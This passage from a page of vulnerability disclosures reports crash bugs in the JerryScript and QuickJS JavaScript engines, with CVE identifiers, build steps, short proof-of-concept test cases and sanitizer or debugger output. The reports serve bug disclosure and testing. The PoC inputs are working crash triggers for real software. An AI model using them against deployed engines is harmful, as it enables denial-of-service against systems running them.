        at /jerryscript/jerry-core/api/jerryscript.c:548                                                                                                                                                                                                                                    
    #14 0x083eac3f in jerryx_source_exec_script (
        path_p=0xffdc21e7 "poc.js")                                                                                                                                                                                                                              
        at /jerryscript/jerry-ext/util/sources.c:68
    #15 0x0812162d in main (argc=<optimized out>, argv=<optimized out>)
        at /jerryscript/jerry-main/main-desktop.c:156                                                                                                                                                                                                                                       
    (gdb) quit                                                                   
    

credits: @EJueon, @Ye0nny of the seclab-yonsei.

CVE-2023-31921: Assertion 'dividend_end_p[0] == divisor_high && dividend_end_p[-1] < divisor_high' failed at /jerryscript/jerry-core/ecma/operations/ecma-big-uint.c(ecma_big_uint_div_mod) · Issue #5068 · jerryscript-

Jerryscript 3.0 *commit 1a2c047) was discovered to contain an Assertion Failure via the component parser_parse_class at jerry-core/parser/js/js-parser-expr.c.

**JerryScript revision**

Commit: 1a2c047  
Version: v3.0.0

**Build platform**

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86\_64)

**Build steps**

python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20

**Test case**

// poc.js
class v0 { v1 \= class v2 {  } }

**Execution steps & Output**

$ ./jerryscript/build/bin/jerry poc.js
ICE: Assertion 'context\_p->scope\_stack\_size == PARSER\_MAXIMUM\_DEPTH\_OF\_SCOPE\_STACK' failed at jerryscript/jerry-core/parser/js/js-parser-expr.c(parser\_parse\_class):1068.
Error: JERRY\_FATAL\_FAILED\_ASSERTION
Aborted

Credits:  
@Ye0nny, @EJueon of the seclab-yonsei.

CVE-2023-31913: Assertion 'context_p->scope_stack_size == PARSER_MAXIMUM_DEPTH_OF_SCOPE_STACK' failed at jerryscript/jerry-core/parser/js/js-parser-expr.c(parser_parse_class):1068. · Issue #5061 · jerryscript-project

QuickJS commit 2788d71 was discovered to contain a stack-overflow via the component js_proxy_isArray at quickjs.c.

**QuickJS Version**

Version : 2788d71

**platform**

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86\_64)

**Build**

*   Address Sanitizer=On
*   Debug (and Release)

**PoC**testcase

Array . isArray ( \[ \] ) ; Array . isArray ( { } ) , Array . isArray ( null ) , Array . isArray ( 0 ) , Array . isArray ( 0.1 ) , Array . isArray ( " " ) , Array . isArray ( void 0 ) , Array . isArray ( new Proxy ( \[ \] , { } ) ) , Array . isArray ( new Proxy ( { } , { } ) ) , Array . isArray ( new Proxy ( new Proxy ( \[ \] , { } ) , { } ) ) , Array . isArray ( new Proxy ( new Proxy ( { } , { } ) , { } ) ) ; for ( var r \= new Proxy ( \[ \] , { } ) , y \= 0 ; y < 131072 ; y ++ ) r \= new Proxy ( r , { } ) ; Array . isArray ( r ) , RangeError ;

// poc.js
for (var r \= new Proxy (\[\],{}) , y \= 0 ; y < 131072 ; y ++ ) 
    r \= new Proxy (r, {}); 
Array . isArray (r);

**Execution steps & Output**

The js\_proxy\_isArray() function and the JS\_IsArray() function are calling each other recursively.  
infinite loop occurs here.

    $ ./qjs poc.js
    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==2347865==ERROR: AddressSanitizer: stack-overflow on address 0x7ffcfb766fd8 (pc 0x557e466f5b94 bp 0x7ffcfb767110 sp 0x7ffcfb766fd8 T0)
        #0 0x557e466f5b93 in js_proxy_isArray ./quickjs/quickjs.c:45242
        #1 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
        #2 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
        #3 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
        #4 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
        #5 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
        ...
        #491 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
        #492 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
        #493 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
        #494 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
        #495 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
        #496 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    
    SUMMARY: AddressSanitizer: stack-overflow ./quickjs/quickjs.c:45242 in js_proxy_isArray
    ==2347865==ABORTING
    

Credits: @Ye0nny, @EJueon of the seclab-yonsei.

Tag

#ubuntu